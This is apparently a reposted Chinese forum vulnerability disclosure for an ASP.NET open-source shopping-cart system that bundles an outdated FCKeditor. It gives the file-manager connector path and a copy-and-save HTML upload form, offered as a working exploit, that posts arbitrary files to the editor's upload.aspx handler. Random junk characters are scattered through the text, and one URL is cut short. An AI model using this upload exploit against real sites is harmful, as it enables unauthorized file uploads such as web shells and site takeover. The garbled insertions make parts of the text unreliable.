披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
4 d+ \% m6 m) J( i2 ]! e 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开
7 h6 N! O S# @# ]5 b" E4 j% n' c, v 简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
- N6 I5 v0 j5 s9 K( H" K 详细说明:其他版本我没测试,估计也是一样的问题& u) @9 p" n1 K6 \& b" _9 P0 w
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx
/ _7 h# y. l6 T% [1 N4 W3 O9 ~ 跳转到网站根目录上传任意文件。
8 V8 A1 `* ~2 V. l8 w" O3 |: f) U 漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件% s4 ?& E& ~8 ]0 V& I
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 l2 C: Z& |0 [7 e7 O3 A! v0 O! ~ K
Upload a new file:<br>' c+ X# Y' V" I/ D, Y6 q3 F; A
<input type="file" name="NewFile" size="50"><br>' L2 t) G6 x+ P
<input id="btnUpload" type="submit" value="Upload">
1 R2 |0 f6 T S2 q/ o- F, i </form> |
发表于 2012-9-10 20:46:29
收藏
支持
反对